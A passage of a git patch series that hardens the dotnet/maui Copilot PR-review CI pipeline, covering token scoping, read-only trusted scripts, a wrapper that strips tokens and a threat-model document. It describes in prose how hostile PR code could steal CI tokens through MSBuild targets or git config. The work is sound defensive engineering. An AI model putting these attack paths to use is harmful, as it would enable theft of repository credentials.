ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], 'NONE')) + condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE')) jobs: - job: RunUITests displayName: 'Run detected UI test categories' variables: - detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'] ] + detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ] # Use the SAME platform-pool selection logic as the CopilotReview # job — the deep-test agent should be the right OS for the # requested target platform. @@ -1245,7 +1299,7 @@ stages: dependsOn: - ReviewPR - RunDeepUITests - condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) + condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) jobs: - job: UpdateComment displayName: 'Post AI summary with review + deep test results' @@ -1254,7 +1308,7 @@ stages: # this just makes the value available as $(aiSummaryCommentId) # inside the steps. variables: - aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.aiSummaryCommentId'] ] + aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId'] ] pool: name: Azure Pipelines vmImage: ubuntu-22.04 From 29b15183aa9e0d9df699c3a2d31a810e97b9d291 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:55:13 +0200 Subject: [PATCH 02/34] Fix review findings: persist regression data across phases - Persist regression risks, tests, and platform to files in Gate phase - Restore regression data + detect script path in CopilotReview phase - Fix stale RunReview references in comments (now RunGate/RunPost) - Fix misleading RunPost step name comment in ci-copilot.yml Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 60 +++++++++++++++++++++++++++++++++-- eng/pipelines/ci-copilot.yml | 2 +- 2 files changed, 58 insertions(+), 4 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 352934935b61..3cc3a1b43426 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -706,10 +706,10 @@ if (Test-Path $detectScript) { # Emit detected categories as an AzDO output variable so downstream # stages (RunDeepUITests, UpdateAISummaryComment) in ci-copilot.yml - # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories']). + # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']). # `isOutput=true` is required for cross-stage consumption; the # variable name is namespaced under the step's `name:` property - # in ci-copilot.yml (currently `RunReview`) by AzDO. + # in ci-copilot.yml (currently `RunGate`) by AzDO. # Local invocations (no $env:TF_BUILD) won't have an AzDO variable # store but the marker is harmless — gets ignored. # Emit detected categories. Blank = "run all", a specific string = categories, @@ -1641,6 +1641,28 @@ $gateVerdictDir = if ($TrustedScriptsDir) { $gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8 Write-Host " 📄 Gate result persisted: $gateResult" -ForegroundColor Gray +# Persist regression data for CopilotReview phase (try-fix instructions) +if ($risksData) { + try { + $risksData | ConvertTo-Json -Depth 10 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-risks.json") -Encoding UTF8 + if ($regressionTests -and $regressionTests.Count -gt 0) { + @($regressionTests) | ConvertTo-Json -Depth 5 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-tests.json") -Encoding UTF8 + } + if ($regrPlatform) { + $regrPlatform | Set-Content (Join-Path $gateVerdictDir "regression-platform.txt") -Encoding UTF8 + } + Write-Host " 📄 Regression data persisted" -ForegroundColor Gray + } catch { + Write-Host " ⚠️ Failed to persist regression data (non-fatal): $_" -ForegroundColor Yellow + } +} + +# Persist detect script path and detected categories for Tier 3 refresh +if ($detectScript) { + $detectScript | Set-Content (Join-Path $gateVerdictDir "detect-script-path.txt") -Encoding UTF8 +} +$uitestCategories | Set-Content (Join-Path $gateVerdictDir "uitest-categories.txt") -Encoding UTF8 + } # end if (-not $skipGateAndTryFix) } # end if ($runGate) @@ -1650,7 +1672,8 @@ if ($runCopilotReview) { # Restore gate result from file when running in phased mode if ($Phase -eq 'CopilotReview') { - $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent + $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() Write-Host " 📄 Restored gate result: $gateResult" -ForegroundColor Gray @@ -1658,6 +1681,37 @@ if ($Phase -eq 'CopilotReview') { $gateResult = "SKIPPED" Write-Host " ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow } + + # Restore regression data persisted by Gate phase + $risksFile = Join-Path $gateVerdictDir "regression-risks.json" + $testsFile = Join-Path $gateVerdictDir "regression-tests.json" + $platFile = Join-Path $gateVerdictDir "regression-platform.txt" + if (Test-Path $risksFile) { + try { + $risksData = Get-Content $risksFile -Raw -Encoding UTF8 | ConvertFrom-Json + if (Test-Path $testsFile) { + $regressionTests = @(Get-Content $testsFile -Raw -Encoding UTF8 | ConvertFrom-Json) + } + if (Test-Path $platFile) { + $regrPlatform = (Get-Content $platFile -Raw).Trim() + } else { + $regrPlatform = if ($Platform) { $Platform } else { "android" } + } + Write-Host " 📄 Restored regression data ($($regressionTests.Count) tests)" -ForegroundColor Gray + } catch { + Write-Host " ⚠️ Failed to restore regression data (non-fatal): $_" -ForegroundColor Yellow + } + } + + # Restore detect script path and UI test categories for Tier 3 refresh + $detectPathFile = Join-Path $gateVerdictDir "detect-script-path.txt" + $catsFile = Join-Path $gateVerdictDir "uitest-categories.txt" + if (Test-Path $detectPathFile) { + $detectScript = (Get-Content $detectPathFile -Raw).Trim() + } + if (Test-Path $catsFile) { + $uitestCategories = (Get-Content $catsFile -Raw).Trim() + } } # Restore review branch diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 890fe6d59942..ef4642279c66 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -726,7 +726,7 @@ stages: fi echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunPost # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.']) + name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryCommentId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId']). Note: detectedCategories comes from RunGate, not RunPost. displayName: 'Task 4: Post (comments + labels)' env: GH_TOKEN: $(GH_COMMENT_TOKEN) From 647786a8cd605b96fdb5135d43e01717e43deef3 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:57:21 +0200 Subject: [PATCH 03/34] Fix detectedCategories routing: coalesce RunReview with RunGate The Tier 3 AI refresh in CopilotReview phase emits detectedCategories under step RunReview, but downstream RunDeepUITests was only reading RunGate. Use coalesce() so AI-refreshed categories are preferred when available, falling back to Gate-detected categories otherwise. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- eng/pipelines/ci-copilot.yml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index ef4642279c66..95232f9994f0 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -821,12 +821,20 @@ stages: - stage: RunDeepUITests displayName: 'Deep UI Tests (platform pool)' dependsOn: ReviewPR - condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE')) + # Prefer AI-refreshed categories from CopilotReview (RunReview) when available, + # falling back to Gate-detected categories (RunGate). RunReview is only set when + # the Tier 3 AI refresh actually changed the categories; otherwise it's empty. + condition: >- + and( + in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), + ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), ''), + ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), 'NONE') + ) jobs: - job: RunUITests displayName: 'Run detected UI test categories' variables: - detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ] + detectedCategories: $[ coalesce(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'], stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']) ] # Use the SAME platform-pool selection logic as the CopilotReview # job — the deep-test agent should be the right OS for the # requested target platform. From 3fd884a72d3adcfb98dde57e1488b2f8fd6c5fd4 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 21:03:21 +0200 Subject: [PATCH 04/34] Fix null crash in Post/CopilotReview phases + add sentinel check - Add TrustedScriptsDir null guard with local fallback in both CopilotReview and Post phase restoration blocks (prevents ParameterBindingException when running locally with -Phase) - Add setup-complete sentinel verification before Gate/CopilotReview/Post phases to fail fast with clear error if Setup didn't complete Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3cc3a1b43426..5cee7c5a901a 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -330,6 +330,20 @@ if ($Phase -eq 'Setup') { exit 0 } +# ─── Sentinel check: verify Setup completed before running later phases ─── +if ($Phase -and $Phase -ne 'Setup') { + $sentinelDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } + $sentinelFile = Join-Path $sentinelDir "setup-complete" + if (-not (Test-Path $sentinelFile)) { + Write-Error "Setup phase did not complete (sentinel not found at '$sentinelFile'). Cannot proceed with -Phase $Phase." + exit 1 + } +} + # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows @@ -1672,7 +1686,11 @@ if ($runCopilotReview) { # Restore gate result from file when running in phased mode if ($Phase -eq 'CopilotReview') { - $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent + $gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() @@ -1971,7 +1989,12 @@ if ($runPost) { # Restore gate result from file when running in phased mode if ($Phase -eq 'Post') { - $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + $gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } + $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() } else { From 485e8657c7c7340bc00f2d55748006fbadf2596d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 22:50:01 +0200 Subject: [PATCH 05/34] Add GH_TOKEN to Gate phase for PR metadata fetches MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The detection script (Detect-TestsInDiff.ps1) fetches PR metadata and labels from the GitHub API. Without GH_TOKEN, these calls are unauthenticated and subject to low rate limits. This adds the token for reliable API access. The token is GH_COMMENT_TOKEN (same as Setup/Post phases). The security boundary is preserved — only CopilotReview (Task 3) lacks GH_TOKEN to prevent the Copilot agent from posting directly. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 2 +- eng/pipelines/ci-copilot.yml | 5 ++++- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 5cee7c5a901a..48b621343f6e 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -93,7 +93,7 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } # exactly the secrets it needs in its env: block. # # Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. -# Task 2 (Gate): env: . dotnet build/test only. +# Task 2 (Gate): env: GH_TOKEN (read-only). dotnet build/test + PR metadata. # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). # Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. # diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 95232f9994f0..56ec29e6e38a 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -644,7 +644,9 @@ stages: # ───────────────────────────────────────────────────────── # Task 2 — GATE: UI detection, test runs, regression, - # gate verification. NO tokens — only dotnet/build tools. + # gate verification. GH_TOKEN is read-only here — needed + # by Detect-TestsInDiff.ps1 for PR metadata/label fetches. + # No COPILOT_GITHUB_TOKEN — the agent can't run here. # ───────────────────────────────────────────────────────── - bash: | echo "═══ TASK 2: GATE ═══" @@ -667,6 +669,7 @@ stages: name: RunGate displayName: 'Task 2: Gate (test verification)' env: + GH_TOKEN: $(GH_COMMENT_TOKEN) PARAM_PR_NUMBER: ${{ parameters.PRNumber }} # ───────────────────────────────────────────────────────── From a22749df1e81334c32d42b72b68e516dd15e9dd7 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 10:41:21 +0200 Subject: [PATCH 06/34] [CI] Plug GH service-connection token leaks in copilot pipeline MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Three small hardening changes uncovered while auditing PR #35324: 1. RunDeepUITests checkout: add persistCredentials: false. This stage merges the PR head and runs PR-modified scripts (BuildAndRunHostApp.ps1, Invoke-UITestWithRetry.ps1) — without this, malicious PR code could read the GitHub App auth header from .git/config. 2. UpdateAISummaryComment checkout: add persistCredentials: false. Defense-in-depth — this stage runs with GH_COMMENT_TOKEN in env. 3. Setup task: chmod -R a-w on the trusted-github dir after copy, so the Copilot agent in Task 3 cannot tamper with the scripts that Task 4 will execute with GH_TOKEN. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- eng/pipelines/ci-copilot.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 56ec29e6e38a..93e621e822bf 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -619,6 +619,7 @@ stages: mkdir -p "$TRUSTED" cp -r .github/scripts "$TRUSTED/scripts" cp -r .github/skills "$TRUSTED/skills" + chmod -R a-w "$TRUSTED" echo "Trusted scripts copied to $TRUSTED" # Run Setup phase (branch checkout + PR merge) @@ -855,6 +856,7 @@ stages: steps: - checkout: self fetchDepth: 0 + persistCredentials: false # Bring in .NET + workloads + tasks DLL — same prerequisites the # CopilotReview job used. Reusing the install-dotnet template @@ -1326,6 +1328,7 @@ stages: timeoutInMinutes: 30 steps: - checkout: self + persistCredentials: false - task: DownloadPipelineArtifact@2 displayName: 'Download CopilotLogs' From ca5ce6d848729605df49af2c91789d5902686d28 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 10:53:28 +0200 Subject: [PATCH 07/34] [CI] Strip GH_TOKEN from PR-code subprocesses; trust eng/scripts copy Addresses two [critical] security findings from MauiBot's 2026-05-24 review of PR #35324 (https://github.com/dotnet/maui/pull/35324): 1. eng/scripts/detect-ui-test-categories.ps1 was being invoked from the PR-merged worktree ($RepoRoot/eng/scripts/...) during the Gate task, which has GH_TOKEN=$(GH_COMMENT_TOKEN) in env. A PR could replace that one file to exfiltrate the maui-bot posting token. Fix: copy eng/scripts into the trusted directory alongside .github/scripts and .github/skills, add $EngScriptsDir resolution in Review-PR.ps1, and route the two $detectScript invocations through it. Same root cause also applied to $uiTestRunner / $deviceTestRunner (now use $ScriptsDir and $SkillsDir instead of $RepoRoot/.github/...). 2. dotnet test, BuildAndRunHostApp.ps1, Run-DeviceTests.ps1, and verify-tests-fail.ps1 all execute PR-controlled code (MSBuild targets, source generators, analyzers, test code, host-app builds). Any of these could read $env:GH_TOKEN via in a .csproj or Directory.Build.targets and POST it. Fix: introduce Invoke-WithoutGhTokens helper that clears GH_TOKEN / GITHUB_TOKEN / COPILOT_GITHUB_TOKEN for the duration of a scriptblock, then restores them. Wrap every Gate-phase invocation of PR-controlled code. Trusted metadata-fetch scripts (Detect-TestsInDiff, Find-RegressionRisks, detect-ui-test-categories) still see GH_TOKEN -- they need it for `gh` CLI. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 50 +++++++++++++++++++++++++++-------- eng/pipelines/ci-copilot.yml | 1 + 2 files changed, 40 insertions(+), 11 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 48b621343f6e..607c06079198 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -93,7 +93,9 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } # exactly the secrets it needs in its env: block. # # Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. -# Task 2 (Gate): env: GH_TOKEN (read-only). dotnet build/test + PR metadata. +# Task 2 (Gate): env: GH_TOKEN. PR-code subprocesses (dotnet test, +# BuildAndRunHostApp.ps1, etc.) are wrapped via +# Invoke-WithoutGhTokens so they cannot exfiltrate the token. # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). # Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. # @@ -106,8 +108,33 @@ $runPost = -not $Phase -or $Phase -eq 'Post' # Resolve the scripts directory — use TrustedScriptsDir if provided (CI), # otherwise use the repo's own .github/ directory (local dev). -$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } -$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } + +# Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks, +# detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that +# executes PR-controlled code (MSBuild targets, test code, source generators, host-app +# builds) would otherwise inherit that token and trivially exfiltrate it via something +# like `` in a .csproj or +# Directory.Build.targets. Wrap every such invocation in Invoke-WithoutGhTokens. +function Invoke-WithoutGhTokens { + [CmdletBinding()] + param([Parameter(Mandatory)][scriptblock]$ScriptBlock) + $saved = @{ + GH_TOKEN = $env:GH_TOKEN + GITHUB_TOKEN = $env:GITHUB_TOKEN + COPILOT_GITHUB_TOKEN = $env:COPILOT_GITHUB_TOKEN + } + try { + $env:GH_TOKEN = $null + $env:GITHUB_TOKEN = $null + $env:COPILOT_GITHUB_TOKEN = $null + & $ScriptBlock + } finally { + foreach ($k in $saved.Keys) { Set-Item -Path ("env:" + $k) -Value $saved[$k] } + } +} # ─── Banner ─────────────────────────────────────────────────────────────────── Write-Host "" @@ -693,7 +720,7 @@ Write-Host "╚═════════════════════ $uitestCategories = "" -$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" +$detectScript = Join-Path $EngScriptsDir "detect-ui-test-categories.ps1" if (Test-Path $detectScript) { try { $detectOutput = & pwsh -NoProfile -File $detectScript -PrNumber "$PRNumber" 2>&1 @@ -822,11 +849,12 @@ if ($uitestCategories -eq 'NONE') { $testExitCode = -1 $envErrHit = $null try { - $runResult = & $sharedRunner ` + $runResult = Invoke-WithoutGhTokens { & $sharedRunner ` -Platform $uitestPlatform ` -Category $cat ` -RepoRoot $RepoRoot ` -LogFile $catLogPath + } if ($runResult) { $testOutput = $runResult.Output $testExitCode = $runResult.ExitCode @@ -1282,8 +1310,8 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O $regrTestDetails = @() $regrPlatform = if ($Platform) { $Platform } else { "android" } - $uiTestRunner = Join-Path $RepoRoot ".github/scripts/BuildAndRunHostApp.ps1" - $deviceTestRunner = Join-Path $RepoRoot ".github/skills/run-device-tests/scripts/Run-DeviceTests.ps1" + $uiTestRunner = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" + $deviceTestRunner = Join-Path $SkillsDir "run-device-tests/scripts/Run-DeviceTests.ps1" foreach ($t in $regressionTests) { Write-Host "" @@ -1294,7 +1322,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O 'UITest' { if (Test-Path $uiTestRunner) { Write-Host " 🖥️ Running UI test via BuildAndRunHostApp.ps1 -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1 + $testOutput = Invoke-WithoutGhTokens { & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1306,7 +1334,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O if (Test-Path $deviceTestRunner) { $dtProject = if ($t.Project) { $t.Project } else { 'Controls' } Write-Host " 📱 Running device test via Run-DeviceTests.ps1 -Project $dtProject -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1 + $testOutput = Invoke-WithoutGhTokens { & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1318,7 +1346,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O if ($t.ProjectPath) { $resolvedProj = Join-Path $RepoRoot $t.ProjectPath Write-Host " 🧪 Running: dotnet test $($t.ProjectPath) --filter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 + $testOutput = Invoke-WithoutGhTokens { dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1459,7 +1487,7 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { # PR like a regression repro), it falls back to "verify failure only" mode # and reports whether the new tests fail without any fix. Passing the flag # would force the script to error out for those PRs. - $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 + $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 } $gateExitCode = $LASTEXITCODE $gateOutput | ForEach-Object { Write-Host " $_" } diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 93e621e822bf..91240747f5a2 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -619,6 +619,7 @@ stages: mkdir -p "$TRUSTED" cp -r .github/scripts "$TRUSTED/scripts" cp -r .github/skills "$TRUSTED/skills" + cp -r eng/scripts "$TRUSTED/eng-scripts" chmod -R a-w "$TRUSTED" echo "Trusted scripts copied to $TRUSTED" From 0d1acf3f5681219cbdd4494b13ec39d4246fbb26 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:15:56 +0200 Subject: [PATCH 08/34] [CI] Add security instructions for ci-copilot pipeline surface Distills the threat model + 8 prevention rules from PR #35324 (and the MauiBot findings + T-Gro audit that surfaced them) into a single .github/instructions file that auto-applies whenever anyone edits any script/yaml/markdown belonging to the Copilot PR-review pipeline. Rules covered: 1. Per-task token scoping (AzDO env: block) 2. persistCredentials: false on every checkout: self 3. Trusted-script copy + chmod -R a-w before PR merge 4. Strip GH_TOKEN/GITHUB_TOKEN/COPILOT_GITHUB_TOKEN from env before invoking PR-controlled code (dotnet test, MSBuild, host-app, etc.) 5. Cross-phase signal files in Agent.TempDirectory, never working tree 6. Strip ##vso[...] from PR-controlled stdout (with CR handling) 7. gh-aw version pinning, .lock.yml regeneration, trusted .github/ restore on workflow_dispatch 8. No tokens via pipeline variables / log lines Includes a code-review checklist and grep anti-pattern scans so future contributors (human or agent) editing any of ~25 files in this surface get the security context automatically via VS Code Copilot applyTo. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 242 ++++++++++++++++++ 1 file changed, 242 insertions(+) create mode 100644 .github/instructions/ci-copilot-pipeline-security.instructions.md diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md new file mode 100644 index 000000000000..c4bcfaa82252 --- /dev/null +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -0,0 +1,242 @@ +--- +description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling." +applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +--- + +# CI Copilot Pipeline — Security Rules + +This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with privileged tokens in scope**: + +| Token | Identity | Scope | +|-------|----------|-------| +| `GH_COMMENT_TOKEN` (a.k.a. `GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo | +| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI | +| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows | + +A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline. + +--- + +## Threat model — assume the PR is hostile + +By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls: + +- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected) +- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree +- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files + +The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**. + +--- + +## Rule 1 — Per-task token scoping (AzDO `env:` block) + +Each task's `env:` block contains 